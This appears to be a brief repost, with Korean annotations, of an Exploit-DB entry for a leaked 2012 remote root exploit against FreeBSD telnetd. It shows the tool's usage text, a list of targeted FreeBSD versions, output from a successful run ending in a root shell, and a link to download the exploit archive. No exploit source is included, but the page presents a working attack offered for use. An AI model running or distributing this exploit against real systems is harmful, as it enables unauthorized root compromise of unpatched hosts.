http://www.exploit-db.com/exploits/19520/
This exploit was leaked on the Full Disclosure mailing list: |
http://seclists.org/fulldisclosure/2012/Jun/404 |
BSD telnetd Remote Root Exploit *ZERODAY* |
usage: telnet [-4] [-6] [-8] [-E] [-K] [-L] [-N] [-S tos] [-X atype] [-c] [-d] |
[-e char] [-k realm] [-l user] [-f/-F] [-n tracefile] [-r] [-s |
src_addr] [-u] [-P policy] [-y] <-t TARGET_NUMBER> [host-name |
1 FreeBSD 8.0/8.1/8.2 i386 |
3 FreeBSD 6.2/6.3/6.4 i386 |
10 FreeBSD 7.1/7.3/7.4 amd64 |
Connected to 192.168.2.8. |
Escape character is '^]'. |
*** EXPLOITING REMOTE TELNETD |
USING TARGET -- FreeBSD 8.2 amd64 |
6:36PM up 5 mins, 1 user, load averages: 0.01, 0.15, 0.09 |
USER TTY FROM LOGIN@ IDLE WHAT |
kcope pts/0 192.168.2.3 6:32PM 4 _su (csh) |
FreeBSD h4x.Belkin 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17 |
root () mason cse buffalo edu:/usr/obj/usr/src/sys/GENERIC amd64 |
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator) |
Exploit: http://www.exploit-db.com/sploits/19520.zip 익스플로잇 다운 로드 |
Free BSD 환경에서만 적용